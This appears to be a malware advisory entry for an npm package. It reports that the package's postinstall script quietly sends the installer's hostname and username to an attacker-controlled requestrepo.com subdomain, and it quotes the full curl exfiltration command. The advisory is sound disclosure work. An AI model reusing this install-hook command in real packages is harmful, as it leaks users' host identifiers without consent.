MAL-2026-6391

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (bd052408bb36e56e940e50ba81f7054844bc91dc0b32eaead5d15ca67f9b5c03) On `npm install`, the package's postinstall.js executes `curl "http://r1x55270.requestrepo.com/pre?h=$(hostname)&u=$(whoami)"`, transmitting the installer's hostname and username over plain HTTP to an attacker-controlled requestrepo.com subdomain (a known DNS/HTTP exfiltration canary service). The package otherwise has no real functionality: index.js is a trivial 3-line date stub, package.json carries placeholder metadata ("A harmless utility package", empty author). The lifecycle hook fires automatically during install without consent, leaking host identifiers to a third party. This is the standard install-time reconnaissance/exfiltration shape.